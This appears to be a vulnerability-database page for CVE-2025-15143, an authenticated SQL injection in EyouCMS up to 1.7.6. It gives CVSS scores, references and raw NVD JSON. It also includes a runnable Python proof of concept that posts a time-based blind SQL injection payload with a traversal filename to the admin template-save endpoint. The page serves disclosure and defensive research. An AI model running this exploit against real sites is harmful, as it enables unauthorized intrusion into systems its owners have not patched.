CVE-2025-15143

Description

A security flaw has been discovered in EyouCMS up to 1.7.6. The affected element is an unknown function of the file /application/admin/logic/FilemanagerLogic.php of the component Backend Template Management. The manipulation of the argument content results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:* - VULNERABLE

EyouCMS <= 1.7.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15143 EyouCMS SQL Injection PoC
# Target: EyouCMS <= 1.7.6
# Component: /application/admin/logic/FilemanagerLogic.php
# Attack Vector: Backend Template Management SQL Injection via 'content' parameter

import requests
import sys
from urllib.parse import quote

def exploit_sql_injection(target_url, admin_cookie):
    """
    SQL Injection PoC for EyouCMS FilemanagerLogic.php
    Requires admin authentication
    """
    
    # SQL injection payload - extracts database version
    # Using time-based blind SQL injection technique
    payload = "test' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '1'='1"
    
    # Target endpoint for template management
    endpoint = f"{target_url}/admin.php/filemanager/save"
    
    headers = {
        'Cookie': admin_cookie,
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    # Malicious data with SQL injection
    data = {
        'content': payload,
        'filename': '../test.html',
        'action': 'edit_template'
    }
    
    print(f"[*] Exploiting: {endpoint}")
    print(f"[*] Payload: {payload}")
    
    try:
        response = requests.post(endpoint, data=data, headers=headers, timeout=10)
        print(f"[+] Response Status: {response.status_code}")
        if response.elapsed.total_seconds() >= 5:
            print("[!] SQL Injection Confirmed - Time-based blind injection successful")
        else:
            print("[-] Injection may have failed or target not vulnerable")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-15143.py <target_url> <admin_cookie>")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_sql_injection(target, cookie)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15143
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15143
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15143/
[4] VulDB https://vuldb.com/cve/CVE-2025-15143
[5] https://note-hxlab.wetolink.com/share/XfINjg5i25Ud
[6] https://vuldb.com/?ctiid.338521
[7] https://vuldb.com/?id.338521
[8] https://vuldb.com/?submit.716078

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15143", "sourceIdentifier": "[email protected]", "published": "2025-12-28T16:15:51.467", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in EyouCMS up to 1.7.6. The affected element is an unknown function of the file /application/admin/logic/FilemanagerLogic.php of the component Backend Template Management. The manipulation of the argument content results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.6", "matchCriteriaId": "F518C731-AF40-4013-8A26-AB96B6CC5E75"}]}]}], "references": [{"url": "https://note-hxlab.wetolink.com/share/XfINjg5i25Ud", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338521", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338521", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716078", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}